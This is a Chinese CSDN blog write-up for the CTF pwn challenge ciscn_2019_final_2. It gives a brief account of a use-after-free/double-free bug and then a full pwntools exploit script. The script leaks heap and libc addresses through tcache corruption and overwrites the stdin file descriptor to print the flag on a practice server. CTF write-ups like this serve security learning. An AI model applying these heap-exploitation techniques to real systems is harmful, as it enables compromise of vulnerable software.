ciscn_2019_final_2

最新推荐文章于 2024-07-19 11:15:19 发布
最新推荐文章于 2024-07-19 11:15:19 发布
阅读量403 收藏
点赞数
分类专栏: PWN 文章标签: 安全 unix 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123986721
版权

漏洞点:

指针未置零。

利用思路:

利用double_free来泄露堆的地址,随后通过修改tcache的指针的指向,也可以实现修改chunk_size,随后free掉该chunk填满tcache即可泄露libc地址,泄露libc地址以后我们可以找到IO_2_1_stdin_的地址,也就是可以找到stdin的文件描述符,我们通过修改其文件描述符,即可输出flagl了。

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './final2'
local_libc  = './libc-2.27.so'
# remote_libc = './libc-2.23.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 29962)
    #libc = ELF(remote_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

buf = 0x555555400000+0x202050

def dbg():
	gdb.attach(r)
	pause()

menu = b'> '
libc = e.libc
def add(index, num):
    sa(b'> ',b'1')
    sa(b'>', str(index).encode())
    sa(b'your inode number:', str(num).encode())

def delete(index):
    sa(menu, b'2')
    sa(b'>', str(index).encode())

def show(index):
    sa(menu, b'3')
    sa(b'>' , str(index).encode())

def leave(message):
    sa(menu, b'4')
    sa(b'what do you want to say at last? ', message)

add(1,0x30)
delete(1)
add(2,0x20)
add(2,0x20)
add(2,0x20)
add(2,0x20)
delete(2)
add(1,0x30)
delete(2)
show(2)
ru('your short type inode number :')
heap_low_2byte = int(ru('\n'))
if heap_low_2byte < 0:
   heap_low_2byte += 0x10000
print('heap_low_2byte=',hex(heap_low_2byte))
add(2,heap_low_2byte - 0xA0)
add(2,0)
delete(1)
add(2,0x30 + 0x20 * 3 + 1)
for i in range(7):
   delete(1)
   add(2,0)
delete(1)
show(1)
ru('your int type inode number :')
addr = int(ru(b'\n'))
if addr < 0:
   addr += 0x100000000
arena = addr -96
base = arena - libc.sym['__malloc_hook']-0x10
success("base:"+hex(base))
addr__IO_2_1_stdin__fileno = base + libc.sym['_IO_2_1_stdin_'] + 0x70
add(2, addr__IO_2_1_stdin__fileno)
add(1, 0)
add(1,666)
sa('which command?',b'4')
r.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 365
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_2019_en_3
fayinq的博客
03-14 445
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1107
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
ciscn_2019_final_2(合并为unsortbin,doublefree)
m0_51251108的博客
11-02 483
ciscn_2019_final_2: 这题对我来说太难啦,写篇博文好好理理思路,如有错误,还望指正 参考师傅:ha1vk checksec一下 64位,保护全开 逆向分析: 主界面main函数: init函数: Sandbox_Loading()函数: 开了个沙盒,貌似啥都用不了了 allocate()函数: 说错啦,第三行字那里,复制可以帮我们改到size free函数: show函数: byebye函数: 大致思路: 堆利用用劫持_IO_2_1_stdin_结构体,修改文件描述符为66
ciscn_2019_ne_5
m0_52231248的博客
11-15 325
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
frps_2019_data_final.xls
02-28
2019美国Federal Reserve Payments Study. The study covered general-purpose and private-label credit, debit, and prepaid cards, electronic benefits transfers (EBT) cards, ACH transfers, wire transfers, ...
code-1_touch_switch_final_android_
10-04
2. **touch_switch_final.ino**:此文件名暗示可能使用了Arduino IDE或兼容环境进行编程,因为".ino"是Arduino项目的默认文件扩展名。在这个项目中,"touch_switch_final"可能是Arduino控制的硬件部分,负责处理实际...
full_stack_final.zip
08-16
2. **数据库配置**:数据库模型、连接字符串和查询脚本,可能是SQL或NoSQL格式。 3. **README**:详细说明项目的构建、运行和测试方法,以及可能遇到的问题和解决方案。 4. **文档**:关于全栈开发的理论知识、最佳...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
BUUCTF-pwn(13)
njh18790816639的博客
01-17 598
wustctf2020_number_game 此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码! -2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648 护网杯_2018_gettingstart 此时又要用到我们的数学知识! 转换浮点数工具 from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './2
ciscn_2019_final_2【write up】
m0_73756460的博客
04-12 103
BUUCTF刷题ciscn_2019_final_2【write up】
ciscn_final_2(堆利用任意地址写4字节+劫持IO流的文件描述符)
seaaseesa的博客
04-09 700
ciscn_final_2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 创建堆,我们只能写入一个4字节或2字节整数。 Show的时候最多也只能显示4字节数据 Delete功能没有清空指针,并且标志是共有的,因此可以通过add另外一种堆来绕过判断,造成double free。 程序开启了沙箱保护。 显然改one_gadget是不能的了。 初始化函数里...
js中的new file_buuoj刷题——ciscn_final_2看_IO_FILE
weixin_39845221的博客
11-29 148
题目概览标准菜单堆,64位题,没有去掉符号表,保护全开。首先nop掉alarm没有edit函数Sandbox_Loading这个函数中调用了prctl函数,然后定义了一大堆变量函数原型int prctl(int option, unsigned long arg2, unsigned long arg3,unsigned long arg4, unsigned long arg5);通过阅读手册,...
【pwn】 ciscn_2019_final_3
Nothing
12-18 1693
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
190727 pwn-ciscn_final_14
热门推荐
whklhhhh的博客
07-27 2万+
搞了快三个小时才出来_(:з」∠)_几乎白给 雷泽太强了! 简单逆向后可以知道 该程序具有注册和登陆功能 注册后会给name赋值为userx,而get_flag的需求为name==adminx passwd成员存储原始密码加盐(随机数)加密后的结果 code成员存储其他成员加盐(随机数)加密后的结果 登录时校验passwd和code Struct: 00000000 User ...
粉尘传感器助力面粉厂安全生产
最新发布
iotsensor的博客
07-19 594
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
eda_res_package_final.tar.gz
11-13
eda_res_package_final.tar.gz是一个文件的名称,该文件是被压缩的.tar.gz文件格式。根据后缀名可以推断出该文件是经过打包和压缩的文件。其中"eda_res_package_final"是该文件的名称,".tar.gz"表示该文件使用tar...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值